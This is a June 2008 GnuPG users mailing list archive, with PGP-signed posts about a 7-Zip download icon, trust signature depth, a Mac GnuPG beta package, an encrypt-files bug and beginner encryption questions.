<4857772C.60301@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Today I downloaded 7z archiver, I was using firefox, and when the download windows opened, I saw: "You chose to open the file 7z457.exe which is: GnuPG Encrypted/Signed File from: http://ufpr.dl.sourceforge.net Do you want to save this file?" And the icon of the file was the green sheet with a green lock. After the download finished, I tried to "verify" it using GPGtools, but as I had expected, it couldn't verify it. So my question is, what kind of relation could that file have with gpg? It was the installer file (doubleclick, and the install process starts), so, I don't think it could be a passwordless encrypted with gpg symmetric encryption... or could it be? Maybe my firefox just made a mistake... or not? Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIV3csAAoJEMV4f6PvczxAvecIAIzYrvsDeZK2uXRc5cHXTe42 irZJuLfga12BjkHkbTVeVLecZFXZSjNrDofRI6jkuWBBtvXWbHJ3dmQRmqX2g+XK iqqMmQoGXbX8RBxxPXAVCZW8yvXMc1rjZjBSFPfKTYNp0Noy7a4Rchr7NKNEK1VT 2ieDJuQ2rxqP3dEXq/YBi/yLMHg6NYAl4X7svz0Tw3Kj0wl7rJTIXWXwKcVgdwHE IkR5NLS73iNqaDXJdePyqy8Y0iCdPgz8s0AaZrwXBjbTWlyQLT/tfC3fLaYzYOeG rBdm3k3QfIIybt1ogjrdTs3zVaV2yFrXOT3JZhGa+k4L2fASV0fAgjboBfjN4jI= =ZbOK -----END PGP SIGNATURE----- From wk at gnupg.org Tue Jun 17 11:30:13 2008 From: wk at gnupg.org (Werner Koch) Date: Tue, 17 Jun 2008 11:30:13 +0200 Subject: Bug: --encrpyt-files: too many open files In-Reply-To: <48562358.8060201@tbz-pariv.de> (Thomas Guettler's message of "Mon, 16 Jun 2008 10:24:56 +0200") References: <48562358.8060201@tbz-pariv.de> Message-ID: <87fxrc2yu2.fsf@wheatstone.g10code.de> On Mon, 16 Jun 2008 10:24, hv at tbz-pariv.de said: > Can someone check if this happens in the latest release, too? I think this has been fixed: sh-3.00$ find . -type f | wc 1558 1558 77429 sh-3.00$ ulimit -n 30 sh-3.00$ find . -type f | gpg2 -r alpha --encrypt-files --always-trust sh-3.00$ find . -type f | wc 3116 3116 161090 sh-3.00$ gpg2 --version gpg (GnuPG) 2.0.10-svn4773 Although this is my current development version I am sure that it has at least been fixed in 2.0.9. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From avi.wiki at gmail.com Tue Jun 17 16:28:21 2008 From: avi.wiki at gmail.com (Avi) Date: Tue, 17 Jun 2008 10:28:21 -0400 Subject: Gnupg-users Digest, Vol 57, Issue 18 In-Reply-To: References: Message-ID: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 For what its worth, I recall getting the gpg icon when I recently installed 7z as well. Avi -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.64 iEYEAREDAAYFAkhXyekACgkQy6A/Rnheoik/swCfcEVbQ+c+5C2BROYDagIpnHlU 5aYAni3UVX4Q+BnBrO8SXE6MPkOPWbZX =kSqx -----END PGP SIGNATURE----- 2008/6/17 : > ---------- Forwarded message ---------- > From: Faramir > To: "gnupg-users at gnupg.org" > Date: Tue, 17 Jun 2008 04:34:52 -0400 > Subject: I saw this strange thing... > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Today I downloaded 7z archiver, I was using firefox, and when the > download windows opened, I saw: > > "You chose to open the file > 7z457.exe > which is: GnuPG Encrypted/Signed File > from: http://ufpr.dl.sourceforge.net > > Do you want to save this file?" > > And the icon of the file was the green sheet with a green lock. After > the download finished, I tried to "verify" it using GPGtools, but as I > had expected, it couldn't verify it. So my question is, what kind of > relation could that file have with gpg? It was the installer file > (doubleclick, and the install process starts), so, I don't think it > could be a passwordless encrypted with gpg symmetric encryption... or > could it be? > > Maybe my firefox just made a mistake... or not? > > Regards > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQEcBAEBAgAGBQJIV3csAAoJEMV4f6PvczxAvecIAIzYrvsDeZK2uXRc5cHXTe42 > irZJuLfga12BjkHkbTVeVLecZFXZSjNrDofRI6jkuWBBtvXWbHJ3dmQRmqX2g+XK > iqqMmQoGXbX8RBxxPXAVCZW8yvXMc1rjZjBSFPfKTYNp0Noy7a4Rchr7NKNEK1VT > 2ieDJuQ2rxqP3dEXq/YBi/yLMHg6NYAl4X7svz0Tw3Kj0wl7rJTIXWXwKcVgdwHE > IkR5NLS73iNqaDXJdePyqy8Y0iCdPgz8s0AaZrwXBjbTWlyQLT/tfC3fLaYzYOeG > rBdm3k3QfIIybt1ogjrdTs3zVaV2yFrXOT3JZhGa+k4L2fASV0fAgjboBfjN4jI= > =ZbOK > -----END PGP SIGNATURE----- > -- en:User:Avraham ---- pub 1024D/785EA229 3/6/2007 Avi (Wikipedia-related) Primary key fingerprint: D233 20E7 0697 C3BC 4445 7D45 CBA0 3F46 785E A229 -------------- next part -------------- An HTML attachment was scrubbed... URL: From jmoore3rd at bellsouth.net Tue Jun 17 16:47:42 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Tue, 17 Jun 2008 10:47:42 -0400 Subject: Armor Icon Associated with 7-Zip Executable In-Reply-To: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> Message-ID: <4857CE8E.7050305@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Avi wrote: > For what its worth, I recall getting the gpg icon when I > recently installed 7z as well. The 'armor' icon indicates that the .exe File has a companion detached Signature file. Had You also downloaded the Sig File You could have verified that the .exe File had been signed by the Author. FWIW: When Replying to a Subject contained within a Digest it is better form to Change the Subject in the Posted Reply to indicate what the Post pertains to. This facilitates Readers in parsing those items they are interested in. JOHN ;) Timestamp: Tuesday 17 Jun 2008, 10:47 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIV86MAAoJEBCGy9eAtCsPT+wIAIuJ6Jz654f44T9VshZznoHv X7yYXCPnr4et7bR5eBqv43oO6rAumWT2ID/MaEioIZ06MS+LH4ucJKnj1YcYR7ZF EqoZA3ljc63ONax6Zl5h1XefSEPRMsPAJAWMQeuJm9LT5GQckNHgNqCoiHyFUD1p payYDhQCi1CyYQVkljHQlnIml6odhuFCWiZ3iJCWbQK0Ksnbt6bCSbkoeNfsQPGM TBMBoCdjlK1AwSDCsFFiZv4VSIL6x4NnvIH4pKvXILzpDlsLimO7pHXBnszM5UPa OYbU3NFQtGwFjP5YMjntS8+p95DIFFkhGFSpt4kcCfTSvK6ikYeMXgKj5qF6uMA= =kgE0 -----END PGP SIGNATURE----- From rick at rickv.com Tue Jun 17 16:41:23 2008 From: rick at rickv.com (Rick Valenzuela) Date: Tue, 17 Jun 2008 10:41:23 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <48573F84.7030901@gmail.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> <4856C0F0.9070306@sixdemonbag.org> <4856CB45.7070308@rickv.com> <48573F84.7030901@gmail.com> Message-ID: <4857CD13.4070102@rickv.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: | Ok, I get the point. Also, I mentioned the word "civilized" trying to | not imply countries which doesn't grant the right to have an attorney's | services are not civilized... that is the reason why I used the "" signs. No worries, man, I understood you. I actually omitted from my last post "and not all border guards are the same." cheers Rick - -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com GnuPG ID: 0xD5644029 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iF4EAREKAAYFAkhXzRMACgkQhHTA8gi5MvDDJAD/bXn41SyuoRc+dAA173jKACnL YGGOdWZ1MtHYwgBhtucBANcqtEif/tpd0gZYrfFr/e2kvyS7umAXBJaVcxnwJe+X =0w3N -----END PGP SIGNATURE----- From faramir.cl at gmail.com Tue Jun 17 21:09:05 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 17 Jun 2008 15:09:05 -0400 Subject: Armor Icon Associated with 7-Zip Executable In-Reply-To: <4857CE8E.7050305@bellsouth.net> References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net> Message-ID: <48580BD1.3060900@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 John W. Moore III escribi?: > Avi wrote: >> For what its worth, I recall getting the gpg icon when I >> recently installed 7z as well. > > The 'armor' icon indicates that the .exe File has a companion detached > Signature file. Had You also downloaded the Sig File You could have > verified that the .exe File had been signed by the Author. It is very interesting... does gpg leave a 'hint' in the .exe file saying there is a detached signature file? I couldn't find a link to download de signature file anywhere, so I am puzzled about how did firefox know there is such file? Best Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIWAvRAAoJEMV4f6PvczxAmjoIAKt0h4tFhh7qfT70cK2B3jj7 TUWLXNLpdh9AdBx3lsBRcuL9YRo0G/ziYVGa0bfhtshhJjg44s/CZsfZ5/bAvbdy dGVVvTURFw3uJ1dpbipJlyNI4/cJ5xlmGe8zcpk8HxYhQlaSMa8Jy3TEGdnJmUM0 5e7Kje/hroL7zjTg6Gy455zXnqIu/V+YeBNUJotWmJB3ZdD1DIu66EMa7E389YPB TgGH8abfTGNDISP8vVYMonxx/uUpfT0aKsF0hiHRGBmWJ0xEUqfyIo4n+3f+zPJj duXaidqsT3COzhX3yzwjfunNQbOuTlylwtCT4xTJLf1KnW7FMKWvX28o2hjsHiE= =33p/ -----END PGP SIGNATURE----- From jmoore3rd at bellsouth.net Tue Jun 17 21:23:06 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Tue, 17 Jun 2008 15:23:06 -0400 Subject: Armor Icon Associated with 7-Zip Executable In-Reply-To: <48580BD1.3060900@gmail.com> References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net> <48580BD1.3060900@gmail.com> Message-ID: <48580F1A.2050606@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: > John W. Moore III escribi?: >> Avi wrote: >>> For what its worth, I recall getting the gpg icon when I >>> recently installed 7z as well. >> The 'armor' icon indicates that the .exe File has a companion detached >> Signature file. Had You also downloaded the Sig File You could have >> verified that the .exe File had been signed by the Author. > > It is very interesting... does gpg leave a 'hint' in the .exe file > saying there is a detached signature file? I couldn't find a link to > download de signature file anywhere, so I am puzzled about how did > firefox know there is such file? Ostensibly, next to or below the Application You downloaded was a Link to Download the Signature for the file. The icon You saw was merely the indicator that the File had been Signed. The Detached Signature must be downloaded separately. JOHN ;) Timestamp: Tuesday 17 Jun 2008, 15:22 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIWA8YAAoJEBCGy9eAtCsPppQH/jlujsHNtZdg1PHJK5TKECoX CM08Q5waIeGtcL2ujCMYN+C/d2m9kED3M9h7MCJw5FfNf8rrRi0yKkZE8L7thfH7 3EIfdbl9VHnmm0i+lfCntPXbKc29FmiDjdewd8KMulWPAP6HJvmFsMlhjQnfhNW8 d61BN+ZeJJUzgCfYz96hxTsLJTZwcbOiQZFAl8o4wbc69HyIfS7yW6/+6AQ1D5Yh eBX+drapS6zAuMlRB72x6q8aRn3Ye3rw0lP4F0HoIT+f3SdFfhW1LF5Mzv0jvBsh 0CbWpSQ5vBC4D5S6wRU0USr48amzIRqfoXg4i/JBGZ7jbYFM0aMt5XjXsHahK+c= =wFNR -----END PGP SIGNATURE----- From benjamin at py-soft.co.uk Tue Jun 17 22:19:00 2008 From: benjamin at py-soft.co.uk (Benjamin Donnachie) Date: Tue, 17 Jun 2008 21:19:00 +0100 Subject: mac-gpg2 v2.0.9 beta available. Message-ID: <48581C34.1060507@py-soft.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 There's currently a beta package for gpg v2.0.9 on the Mac available at http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-1.zip Signature at http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-1.zip.asc Universal binary tested on MacOSX v10.4 and v10.5. Unzip and then run resulting install package. Until fully integrated into the macgpg project, support available on the macgpg2 list - https://www.py-soft.co.uk/mailman/listinfo/macgpg2 Notes: To use the OpenPGP smartcard with SSH you will need to add the line "enable-ssh-support" to ~/.gnupg/gpg-agent.conf You then need to log out and then back in again for it to work. If you installed mac-gpg2 by hand previously, any entry in .profile relating to source ~/.gpg-agent-info or source ~/.gnupg/.gpg-agent can be removed. This install will overwrite the file ~/.MacOSX/environment.plist on every login. If you do not know what this means then generally you do not need to worry. If you do have one, it's fair to assume that you are capable of editing /usr/local/sbin/gpg-login.sh to add the required statements back in. This install will NOT replace and existing Login and Logout hooks. If you have any existing hooks you will need to run the following from the command line: sudo defaults write com.apple.loginwindow LoginHook /usr/local/sbin/gpg-login.sh sudo defaults write com.apple.loginwindow LogoutHook /usr/local/sbin/gpg-logout.sh Further refinements planned before release in order of priority: LoginHook - only kill dead standard sockets if gpg-agent set to use standard sockets. Install script - produce error message if Login/out scripts already exist and not mac-gpg2. Alternatively, replace any hooks but ensure message displayed/warning given. Overall - improve install experience and package as dmg. LoginHook - add facility for optional file to contain additional environment.plist statements to avoid editing of scripts. LoginHook - remove requirement for environment file and use output from gpg-agent instead. Ben -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.9 (Darwin) Comment: Built by the macgpg project - http://macgpg.sourceforge.net/ Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIcBAEBAgAGBQJIWBwlAAoJEOgNmph0Y1E2zBsP/1arlnGj8sns6SDRTJXSDHmB p5EV/Mv3McU4whPa/C4BhhqlbjDDxjTIybmrg3ZVTJSsYvEKFPeISBas63jvRSlh MLrAeD3Vbc/g7dpqTp7GnaV8YHdiBQdFWvNb90Jm7exqWZpGJjWi+SnwqORQbeXD 3A0KBDvVQK/bsWXFiNYp9Fo7vOHUhSfxzORnVSMgpLyiEus+gQRmRYqPR6Z0VKRv N3uF10PKhlOEQOfrDHGWCJzBL0bS+ySH5cjdLZzIKsvYpJitQEUyEgjBLFaZqsLa 8Y2ynWbqIZs1vdv8RfBs8Zv5p4RAVhVhKEfFHiXo+qJ6EgTHevgVKiwqDDTt4psB XDjOZaUrtA3w3Z0sn6EER4r9hWGeygJWSaF1rCn8jFIkhxYCzRWMj4hoN26h9HPs w1Ht18CnnTWikuSIp9A1dkIXN0xWsdZiZh56UQWSwa4QFDR5L2ruqTR6/Fg1nAw7 OzdSPNQKq/LdZQgS4v+gkiRdRWZG4mC3CoQNcoA2eWiCLw+Xu2RKSe3HLv5z60n3 7yjlKr2StMwfkazW8kNrY0XktQnINwwG/XRcZAHK/cTHnnWla3A+NdIfIr8qnrMm 4qh/FKK/CTG+KMIpFMhDGGouJRRYzgE2NojrG/DkSW5r54npabh0EzED35ZZHCwI Ok1FwGZ0Lyf6FRbLg0RP =JGL0 -----END PGP SIGNATURE----- From george.davidescu at gmail.com Tue Jun 17 23:09:06 2008 From: george.davidescu at gmail.com (bezna) Date: Tue, 17 Jun 2008 14:09:06 -0700 (PDT) Subject: Questions about trust signatures In-Reply-To: <20080616210212.GB14148@jabberwocky.com> References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> <17872484.post@talk.nabble.com> <20080616210212.GB14148@jabberwocky.com> Message-ID: <17937638.post@talk.nabble.com> Hi, I think I made a small error in my last post, and I want to alleviate any confusion. I made the following statment: "The next hop in the chain will have an appropriate trust value of "undefined", and the one following it will simply be "unknown"." This is somewhat incorrect. In the case where Bob issues a tsign with a depth greater than the one issued to him by Alice, the next link in the chain (Charlie) will appear as valid to Alice but his trust will be "undefined". David, who was tsigned by Charlie, will then appear to Alice with a validity of "undefined" and a trust of "undefined". Finally, Elena, who was signed normally (tsign of 0) by Charlie, will have a validity of "unknown" and a trust of "unknown". This all makes sense to me semantically but I just wanted to clarify so people don't get confused by my last post. George David Shaw wrote: > > On Mon, Jun 16, 2008 at 01:14:52PM -0700, bezna wrote: >> >> Dear David, >> >> First, thank you for your reply and for the working link to the white >> paper. >> You have my enormous gratitude for taking the time to share your >> knowledge >> with me. >> >> >> David Shaw wrote: >> > >> >> Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own >> >> purposes), the chain of trust linking Eve to Alice would be broken >> >> since GPG computes certificate validity (and trust in the case of >> >> tsigns) only down paths where each next node in the path was tsigned >> >> with a lower ???depth??? than the ???depth??? of the tsign on the >> >> node before it. >> > >> > The chain isn't broken, the depth at each step is just lowered to >> > match the perspective of the head of the chain (Alice in this case). >> > If Bob tsigns Carmen, then from Bob's perspective, that chain in the >> > link had a depth of 4. Similarly, if Roger signs Bob's key with a >> > depth of 5, then we have a new chain from Roger's perspective where >> > the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key >> > with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it >> > is lowered to match the maximum depth granted by Roger). If Roger >> > signed Bob's key with a depth of 50, then the Bob->Carmen link has a >> > depth of 4 (as it can't be larger than what Bob granted). >> > >> >> I believe you might be mistaken on this point. I ran some trials and it >> seems that if the next trust signature in the chain has a higher depth >> than >> the one preceding it, it is treated just as a regular signature (depth 0) >> and the trust data contained in the signature is discarded, effectively >> breaking the chain. The next hop in the chain will have an appropriate >> trust >> value of "undefined", and the one following it will simply be "unknown". >> See >> for yourself: > > Interesting. I'm going to have to go back to my notes from when I > wrote that code back in 2002, and see what I was shooting for. My > memory is that I wanted the trust depth to automatically degrade as > the chain continued. It's possible this is just a bug, or it is > possible I did it this way on purpose (PGP compatibility, maybe?) > > I'll let you know what I find. > > David > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > -- View this message in context: http://www.nabble.com/Questions-about-trust-signatures-tp17789248p17937638.html Sent from the GnuPG - User mailing list archive at Nabble.com. From avi.wiki at gmail.com Wed Jun 18 01:39:44 2008 From: avi.wiki at gmail.com (Avi) Date: Tue, 17 Jun 2008 19:39:44 -0400 Subject: Subject: I saw this strange thing... Message-ID: <27ee9bfb0806171639ic1837edha25d57f3a0ebb386@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Sorry. I try to, but gmail's web interface hides the subject of a reply as the defualt, and I do forget. Thanks, - --Avi -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.64 iEYEAREDAAYFAkhYSysACgkQy6A/RnheoikOywCcCN7VPrZuvQJbyFcydanl4ink 5TkAniYcP26nk9HA6lzIu/yYqLoS3OJa =I3Yk -----END PGP SIGNATURE----- 2008/6/17 : > --------- Forwarded message ---------- > From: "John W. Moore III" > To: #3GnuPG Users List > Date: Tue, 17 Jun 2008 10:47:42 -0400 > Subject: Re: Armor Icon Associated with 7-Zip Executable > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > Avi wrote: > > For what its worth, I recall getting the gpg icon when I > > recently installed 7z as well. > > The 'armor' icon indicates that the .exe File has a companion detached > Signature file. Had You also downloaded the Sig File You could have > verified that the .exe File had been signed by the Author. > > FWIW: When Replying to a Subject contained within a Digest it is better > form to Change the Subject in the Posted Reply to indicate what the Post > pertains to. This facilitates Readers in parsing those items they are > interested in. > > JOHN ;) > Timestamp: Tuesday 17 Jun 2008, 10:47 --400 (Eastern Daylight Time) > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.5.0-svn4754: (MingW32) > Comment: Public Key at: http://tinyurl.com/8cpho > Comment: Gossamer Spider Web of Trust: https://www.gswot.org > Comment: Homepage: http://tinyurl.com/yzhbhx > > iQEcBAEBCgAGBQJIV86MAAoJEBCGy9eAtCsPT+wIAIuJ6Jz654f44T9VshZznoHv > X7yYXCPnr4et7bR5eBqv43oO6rAumWT2ID/MaEioIZ06MS+LH4ucJKnj1YcYR7ZF > EqoZA3ljc63ONax6Zl5h1XefSEPRMsPAJAWMQeuJm9LT5GQckNHgNqCoiHyFUD1p > payYDhQCi1CyYQVkljHQlnIml6odhuFCWiZ3iJCWbQK0Ksnbt6bCSbkoeNfsQPGM > TBMBoCdjlK1AwSDCsFFiZv4VSIL6x4NnvIH4pKvXILzpDlsLimO7pHXBnszM5UPa > OYbU3NFQtGwFjP5YMjntS8+p95DIFFkhGFSpt4kcCfTSvK6ikYeMXgKj5qF6uMA= > =kgE0 > -----END PGP SIGNATURE----- > -- en:User:Avraham ---- pub 1024D/785EA229 3/6/2007 Avi (Wikipedia-related) Primary key fingerprint: D233 20E7 0697 C3BC 4445 7D45 CBA0 3F46 785E A229 -------------- next part -------------- An HTML attachment was scrubbed... URL: From kurtc1972 at gmail.com Wed Jun 18 03:55:04 2008 From: kurtc1972 at gmail.com (kurt c) Date: Tue, 17 Jun 2008 18:55:04 -0700 Subject: key-export protocol Message-ID: <7a26d9ab0806171855n1d32d68aued307f737dd8ca6e@mail.gmail.com> Hello everyone. I'm new and this is my first post. Please excuse me for my dumb question. My question is: I was trying to export my public key to keyservers with my GPA. The dialogue box said it will export to hkp:// random.sks.keyserver.penguin.de. But when I clicked okay a pop-up appeared which said: "there is no plug-in available for the keyserver protocol you specified." What does it mean? What plug-in do I need? Why? Thank you everyone. -------------- next part -------------- An HTML attachment was scrubbed... URL: From benjamin at py-soft.co.uk Wed Jun 18 05:44:59 2008 From: benjamin at py-soft.co.uk (Benjamin Donnachie) Date: Wed, 18 Jun 2008 04:44:59 +0100 Subject: mac-gpg2 v2.0.9 beta available. In-Reply-To: <48581C34.1060507@py-soft.co.uk> References: <48581C34.1060507@py-soft.co.uk> Message-ID: <485884BB.4050001@py-soft.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Benjamin Donnachie wrote: | There's currently a beta package for gpg v2.0.9 on the Mac available at Slight bug fix whereby ~/.MacOSX/ was not created if missing: http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-2.zip Signature at http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-2.zip.asc | To use the OpenPGP smartcard with SSH you will need to add the line | "enable-ssh-support" to ~/.gnupg/gpg-agent.conf You then need to log | out and then back in again for it to work. | If you installed mac-gpg2 by hand previously, any entry in .profile | relating to source ~/.gpg-agent-info or source ~/.gnupg/.gpg-agent can | be removed. | This install will overwrite the file ~/.MacOSX/environment.plist on | every login. If you do not know what this means then generally you do | not need to worry. If you do have one, it's fair to assume that you are | capable of editing /usr/local/sbin/gpg-login.sh to add the required | statements back in. See below - additional statements can now be added to the file ~/.MacOSX/environment.plist.footer | This install will NOT replace and existing Login and Logout hooks. If | you have any existing hooks you will need to run the following from the | command line: This install now replaces any existing Login and Logout hooks. A future release may preserve existing hooks. | Further refinements planned before release in order of priority: | LoginHook - only kill dead standard sockets if gpg-agent set to use | standard sockets. Done. | Overall - improve install experience and package as dmg. Awaits formal release. | LoginHook - add facility for optional file to contain additional | environment.plist statements to avoid editing of scripts. Done - add any additional items to the file ~/.MacOSX/environment.plist.footer in the format: name value | LoginHook - remove requirement for environment file and use output from | gpg-agent instead. .gpg-agent-info is used by other programs, such as GPGMail, and therefore will remain. Ben -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.9 (Darwin) Comment: Built by the macgpg project - http://macgpg.sourceforge.net/ Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIcBAEBAgAGBQJIWIS2AAoJEOgNmph0Y1E2f58P/i36fIargWgpNlx2d6ilqO7J jcsHymP64S+L96SFI6rKWGFBmYN70MLNg2Xum3QPi9yDGxDoAycqDLga67Vk4Xrb znv0NG4BgOipM/l+9bHhdK1yGOeEIHdcFslpK1zkAjgB9bC3VXuBDol6lSXj7dPD CGJrDN7tOSsfE139uph3EI2V2NVUJqgViD90ETcLHZIRXVyDQAwxg0HTu4PkJ3xZ 4h5LPXumF2xbl4FfxsXfC99zHfLZN9IHcW8aeClTVGMIgVvJLEEvFsiUDL7bLTxW x5rpN53rz9n9yQ5QbF2MpBl+Nt3OqYt5S1u1dCQ704YoHJIFCNGMMFnYLh0Gk5hS TYqc5HXvwpPBR63Xy3QY20Uh/Gb7GIUDpRol2kHAM+QM7QHR9HFslN2Da27uYScD 18oso24Pe1hSCchRqwQsG485EvTuTPAz+/hobo/1dYmfZtI5NNULJTeGtSDtY06D Xr6sQCecqXwdPDW1J6DqmMmh4S1e+BriN7ndxm5TFpV4zcFrqHxuo+atBCqz+D71 wsMWPrED+ApwXIH9/pCzst7jt0n3YJD4fH3ksSMQy0iEB/AzxahjNlchPRy/1h5n 64o4rDUBxi/0G2frT3ub1FB5r1QyM04WYglmepzO+WuIQwxzBvVdDOtcRLeUjpGX yELxMuczDAEoaN5Xtg5y =QM+k -----END PGP SIGNATURE----- From elmer.espinosa at gmail.com Wed Jun 18 05:02:18 2008 From: elmer.espinosa at gmail.com (Elmer Espinosa) Date: Wed, 18 Jun 2008 11:02:18 +0800 Subject: error on ecrypting file Message-ID: <78f71be20806172002y78d89c9w52406e0506336484@mail.gmail.com> Hi to all, I generate key using a command gpg --gen-key. Then after that I want to encrypt a file I used a command gpg -e file I got a message " Enter the user id. End with the empty line:" when I enter the user id that I put during key generation it ask me again to "Enter the user id. End with the empty line" And the file is not encrypted. Is there missing in my command. Thanks, Elmer -------------- next part -------------- An HTML attachment was scrubbed... URL: From email at sven-radde.de Wed Jun 18 06:41:03 2008 From: email at sven-radde.de (Sven Radde) Date: Wed, 18 Jun 2008 06:41:03 +0200 Subject: Armor Icon Associated with 7-Zip Executable In-Reply-To: <48580F1A.2050606@bellsouth.net> References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net> <48580BD1.3060900@gmail.com> <48580F1A.2050606@bellsouth.net> Message-ID: <1213764063.6671.9.camel@carbon> Hi! Am Dienstag, den 17.06.2008, 15:23 -0400 schrieb John W. Moore III: > Ostensibly, next to or below the Application You downloaded was a Link > to Download the Signature for the file. ?When looking at 7-zip.org and their Sourceforge site, I did not find anything like a separate detached signature for download and downloading the .exe was absolutely "normal". > The icon You saw was merely the > indicator that the File had been Signed. It is not possible to determine whether a detached signature exists by merely looking at the original file. cu, Sven From aongenae at gmail.com Wed Jun 18 08:20:03 2008 From: aongenae at gmail.com (Arnaud Ongenae) Date: Wed, 18 Jun 2008 08:20:03 +0200 Subject: error on ecrypting file In-Reply-To: <78f71be20806172002y78d89c9w52406e0506336484@mail.gmail.com> References: <78f71be20806172002y78d89c9w52406e0506336484@mail.gmail.com> Message-ID: <83713a650806172320p666719efy60688635a3f02e7d@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The idea is that gpg allow to encrypt the file for several persons, so it ask you all the receivers... simply hit the key to end and it will encrypt to message. (user id is everything that can differentiate the key you want to use amongst every key you own (can be the id, email, name, ...) note if you encrypt the file with your public key, you will be the only one to be able to decrypt it. _-Arnaud-_ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: http://getfiregpg.org iQEcBAEBAgAGBQJIWKetAAoJEFgy9SDyxO8hs7UIAJJuZpKAqJAq+UX2D0WMdsb+ 9qOzg1XQly9CxhgTeorcYeeRbsymLxN0Dde/jQXa9PlaD/LKU50f0fzxHZLje0m7 5ZqqNy4JYFjOGXObfpoy3pSQLZ5lWzglPPlJbxgDDbJY5wcVVgpzx+oMu/PO02kz 9556tsTDrQhWZYeWpVi6AcPOC3B88ua17SuFjL3c49+rLYIxG1veuol3UtDizBwb XjXm0e2GpvU2LA6gyW6Z3TBZnqIkcXi9yNnSiUpuA9fhuxqz9BUjINhRHm8XgVPL R7z3hzTdH0vHe0gsXeLaZUOLp47PSaLiMb0IPT7yL+EaxGnD0UmpfDwhTx6j2iU= =Fo6b -----END PGP SIGNATURE----- 2008/6/18 Elmer Espinosa : > Hi to all, > > I generate key using a command gpg --gen-key. Then after that I want to > encrypt a file I used a command gpg -e file > I got a message " Enter the user id. End with the empty line:" when I > enter the user id that I put during key generation it ask me again to "Enter > the user id. End with the empty line" > And the file is not encrypted. > > Is there missing in my command. > > Thanks, > Elmer > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > From naomiza at hotmail.com Tue Jun 17 17:12:58 2008 From: naomiza at hotmail.com (NNZZ) Date: Tue, 17 Jun 2008 08:12:58 -0700 (PDT) Subject: Encryption failed in one command but succeeded in another... Message-ID: 